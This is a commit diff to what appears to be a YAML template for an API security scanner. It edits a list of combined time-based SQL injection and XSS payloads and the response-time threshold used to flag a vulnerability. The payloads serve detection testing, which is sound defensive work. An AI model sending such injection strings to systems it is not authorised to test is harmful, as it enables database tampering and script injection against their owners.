@@ -76,12 +76,12 @@ api_selection_filters:
76
76
extract : userVal
77
77
wordLists :
78
78
timeBasedPayloads :
79
- - " ' AND IF(1=1, SLEEP(5 ), 0) UNION SELECT null,'<script>alert(\" XSS\" );</script>' --"
80
- - " ' OR IF(1=1, SLEEP(5 ), 0) UNION SELECT null,concat('<svg/onload=alert(\" XSS\" )>') --"
81
- - " ' AND IF(1=1, SLEEP(5 ), 0) UNION SELECT null,'<img src=\" x\" onerror=\" alert('XSS')\" > --"
82
- - " ' OR IF(1=1, SLEEP(5 ), 0) UNION SELECT null,concat('<script>alert(\" XSS\" );</script>') --"
83
- - " ' AND IF(1=1, SLEEP(5 ), 0) UNION SELECT null,'<svg/onload=alert(\" XSS\" )>' --"
84
- - " ' OR IF(1=1, SLEEP(5 ), 0) UNION SELECT null,concat('<img src=\" x\" onerror=\" alert('XSS')\" >') --"
79
+ - " ' AND IF(1=1, SLEEP(500 ), 0) UNION SELECT null,'<script>alert(\" XSS\" );</script>' --"
80
+ - " ' OR IF(1=1, SLEEP(500 ), 0) UNION SELECT null,concat('<svg/onload=alert(\" XSS\" )>') --"
81
+ - " ' AND IF(1=1, SLEEP(500 ), 0) UNION SELECT null,'<img src=\" x\" onerror=\" alert('XSS')\" > --"
82
+ - " ' OR IF(1=1, SLEEP(500 ), 0) UNION SELECT null,concat('<script>alert(\" XSS\" );</script>') --"
83
+ - " ' AND IF(1=1, SLEEP(500 ), 0) UNION SELECT null,'<svg/onload=alert(\" XSS\" )>' --"
84
+ - " ' OR IF(1=1, SLEEP(500 ), 0) UNION SELECT null,concat('<img src=\" x\" onerror=\" alert('XSS')\" >') --"
85
85
execute :
86
86
type : multiple
87
87
requests :
@@ -139,7 +139,7 @@ validate:
139
139
and :
140
140
- compare_greater :
141
141
- ${x2.response.stats.median_response_time}
142
- - 5001
142
+ - 15001
143
143
- compare_greater :
144
144
- ${x2.response.stats.median_response_time}
145
145
- ${x1.response.stats.median_response_time} * 5
0 commit comments